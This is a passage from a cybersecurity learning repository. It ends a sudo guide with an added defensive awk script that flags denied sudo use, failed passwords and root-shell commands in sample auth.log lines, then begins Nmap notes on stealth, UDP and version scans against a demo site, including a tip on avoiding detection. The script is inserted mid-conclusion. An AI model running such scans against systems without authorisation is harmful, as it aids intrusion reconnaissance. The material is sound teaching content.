| `Permission denied`               | Wrong file permissions    | Use `ls -l` and correct ownership |

---

## Conclusion

Understanding `sudo` is critical for L1 Linux and cybersecurity practitioners.
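
The monitoring commands in this guide (`grep sudo /var/log/auth.log`) print every line that mentions sudo. As an added example (not part of the original guide), the script below keeps only real sudo command events and labels denied attempts, failed passwords and root shells such as `sudo su` or `sudo -i`; the log lines, host and user names are constructed samples, and `write_sample_log`, `sudo_triage` and `sudo_alerts` are hypothetical helper names.

```shell
#!/bin/sh
# Added example: classify sudo events in auth.log-style input.

# Constructed sample lines (host "lab" and the users are made up).
write_sample_log() {
    cat <<'EOF'
Dec 16 10:02:11 lab sudo:   devadmin : TTY=pts/0 ; PWD=/home/devadmin ; USER=root ; COMMAND=/usr/bin/apt update
Dec 16 10:05:42 lab sudo: internuser : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/internuser ; USER=root ; COMMAND=/usr/bin/nano /etc/hosts
Dec 16 10:07:03 lab sudo[2211]:   devadmin : TTY=pts/0 ; PWD=/home/devadmin ; USER=root ; COMMAND=/usr/bin/su
Dec 16 10:07:03 lab sudo[2211]: pam_unix(sudo:session): session opened for user root(uid=0) by devadmin(uid=1000)
Dec 16 10:09:30 lab sudo:   devadmin : 3 incorrect password attempts ; TTY=pts/0 ; PWD=/home/devadmin ; USER=root ; COMMAND=/usr/sbin/reboot
Dec 16 10:12:54 lab sudo:   devadmin : TTY=pts/0 ; PWD=/home/devadmin ; USER=root ; COMMAND=/bin/bash
Dec 16 10:13:20 lab sshd[900]: Accepted password for devadmin from 192.0.2.10 port 50022 ssh2
EOF
}

# Print "TAG<TAB>user<TAB>command" for every sudo command event.
# Reads the files given as arguments, or stdin when there are none.
sudo_triage() {
    awk '
    / sudo(\[[0-9]+\])?: / && /COMMAND=/ {
        rest = $0
        sub(/^.* sudo(\[[0-9]+\])?: +/, "", rest)   # drop timestamp, host, tag
        user = rest; sub(/ :.*$/, "", user)          # text before the first " :"
        cmd = rest;  sub(/^.*COMMAND=/, "", cmd)     # text after COMMAND=
        if (rest ~ /NOT in sudoers|command not allowed/)
            tag = "DENIED"
        else if (rest ~ /incorrect password attempt/)
            tag = "BADPASS"
        else if (rest ~ /USER=root / && cmd ~ /^(\/usr)?\/bin\/(su|sh|bash|dash|zsh)( |$)/)
            tag = "ROOTSHELL"    # sudo su, sudo -i and sudo -s land here
        else
            tag = "OK"
        printf "%s\t%s\t%s\n", tag, user, cmd
    }' "$@"
}

# Only the events worth a second look.
sudo_alerts() {
    sudo_triage "$@" | awk -F '\t' '$1 != "OK"'
}

write_sample_log | sudo_alerts
```

On a real host, `sudo_alerts /var/log/auth.log` needs read access to the log, the same as the `grep` commands in the guide.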
It enforces control, improves auditability, and limits damage from mistakes. Learn to use it wisely.

---

Maintained by: **[Vaishnavu C V](https://github.com/vaishnavucv)**
Principal CyberSecurity Engineer | Ethical Hacker | Cyber Range Mentor

--------------------------------------------------------------------------------
/Nmap Command Notes L1, L2 and L3.md:
--------------------------------------------------------------------------------
# Cybersecurity Notes Repository

Welcome to the `cybersecurity-note` repository. This repository serves as a foundational knowledge base for cybersecurity learners, enthusiasts, and professionals. This document specifically covers **Nmap Command Notes**, focusing on its usage and command-line options relevant for L1 (Beginner), L2 (Intermediate), and L3 (Advanced) cybersecurity professionals.

---

## 🛠 Nmap Command Notes: L1-L2-L3 (Beginner Focused with Examples)

### 1. 🎯 TARGET SPECIFICATION

* `-iL`: Input target list from a file

```cmd
nmap -iL targets.txt
```

**Scenario**: You have multiple IPs or domains in a file (`targets.txt`) and want to scan all of them at once.

### 2. 🌐 HOST DISCOVERY

* `-sL`: List Scan – list targets only

```cmd
nmap -sL zero.webappsecurity.com
```

**Scenario**: Just check the hostname resolution for review, without scanning ports.

* `-sn`: Ping Scan – check if host is up, no ports scanned

```cmd
nmap -sn zero.webappsecurity.com
```

**Scenario**: Confirm if the host is live before deeper scanning.

* `-Pn`: Assume host is up, skip ping check

```cmd
nmap -Pn zero.webappsecurity.com
```

**Scenario**: Use when host blocks ICMP/ping (still want port scan).

### 3. ⚙️ SCAN TECHNIQUES

* `-sS`: TCP SYN scan (stealth scan)

```cmd
nmap -sS zero.webappsecurity.com
```

**Scenario**: Identify open ports without completing TCP handshake.

* `-sT`: TCP connect scan

```cmd
nmap -sT zero.webappsecurity.com
```

**Scenario**: Useful if you're running as a normal user (non-root).

* `-sA`: ACK scan

```cmd
nmap -sA zero.webappsecurity.com
```

**Scenario**: Check firewall rules or filtering behavior.

* `-sU`: UDP scan

```cmd
nmap -sU zero.webappsecurity.com
```

**Scenario**: Identify open UDP services (like DNS, SNMP).

### 4. 🚪 PORT SPECIFICATION AND SCAN ORDER

* `-p`: Scan specific ports

```cmd
nmap -p 80,443 zero.webappsecurity.com
```

**Scenario**: Limit scan to known web service ports.

* `--exclude-ports`: Skip specific ports

```cmd
nmap --exclude-ports 22,25 zero.webappsecurity.com
```

**Scenario**: Avoid scanning SSH and mail ports.

* `-F`: Fast scan (limited ports)

```cmd
nmap -F zero.webappsecurity.com
```

**Scenario**: Quick scan of the most common ports.

* `-r`: Scan ports sequentially

```cmd
nmap -r zero.webappsecurity.com
```

**Scenario**: Avoid randomization for analysis or teaching purposes.

### 5. 🔍 SERVICE/VERSION DETECTION

* `-sV`: Detect service versions

```cmd
nmap -sV zero.webappsecurity.com
```

**Scenario**: Understand what software/version is running on open ports.

* `--version-intensity`

```cmd
nmap -sV --version-intensity 2 zero.webappsecurity.com
```

**Scenario**: Perform lighter version detection to avoid detection.

* `--version-light`

```cmd
nmap -sV --version-light zero.webappsecurity.com
```

**Scenario**: Use the most common probes only.

* `--version-all`

```cmd
nmap -sV --version-all zero.webappsecurity.com
```

**Scenario**: Perform a full and deep version probe.

* `--version-trace`

```cmd
nmap -sV --version-trace zero.webappsecurity.com
```

**Scenario**: See how Nmap tries to identify each service.

### 6. 📜 SCRIPT SCAN

* `-sC`: Run default scripts

```cmd
nmap -sC zero.webappsecurity.com
```

**Scenario**: Run built-in checks (like SSH version, HTTP headers).

* `--script=